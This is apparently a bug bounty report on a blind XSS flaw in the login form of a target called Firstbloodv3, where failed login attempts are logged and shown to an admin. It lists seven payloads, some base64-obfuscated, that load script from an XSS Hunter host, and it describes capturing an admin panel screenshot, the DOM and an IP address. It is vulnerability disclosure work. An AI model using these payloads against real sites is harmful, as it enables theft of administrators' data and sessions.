BugBountyHunter

Hello Team,

I have found a Blind XSS vulnerability on Firstbloodv3. When you visit the login page, you will notice the message "Login attempts will be logged".

That made me think there could either be a Blind XSS or Log4j bug here. The application being built on PHP rules out Log4j, so I tried Blind XSS and it worked.

Steps to Reproduce:

1. Go to the login page.
2. Enter Blind XSS payload in the username/password fields.

You will receive a notification of your Blind XSS being fired in your inbox. The XSS fires on https://firstblood-helper.com/login_attempts.php?id=9056

You can create Blind XSS payloads by self hosting XSS hunter or by using an account on https://xsshunter.com. Some sample payloads that can be used and worked for me:

1. "><script src=https://a6zxssht.xss.ht></script>
2. javascript:eval('var a=document.createElement(\'script\');a.src=\'https://a6zxssht.xss.ht\';document.body.appendChild(a)')
3. "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
4. "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>
5. "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
6. "><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://a6zxssht.xss.ht";parent.document.body.appendChild(a);</script>">
7. <script>$.getScript("//a6zxssht.xss.ht")</script>

Impact: We are able to get a screenshot of admin panel where XSS gets fired for user Administrator-Sean. Along with that, the Blind XSS also leaks other information like:

1. IP address: https://www.ip-tracker.org/lookup.php?ip=86.145.182.70
2. Entire DOM data
3. Screenshot of Admin panel: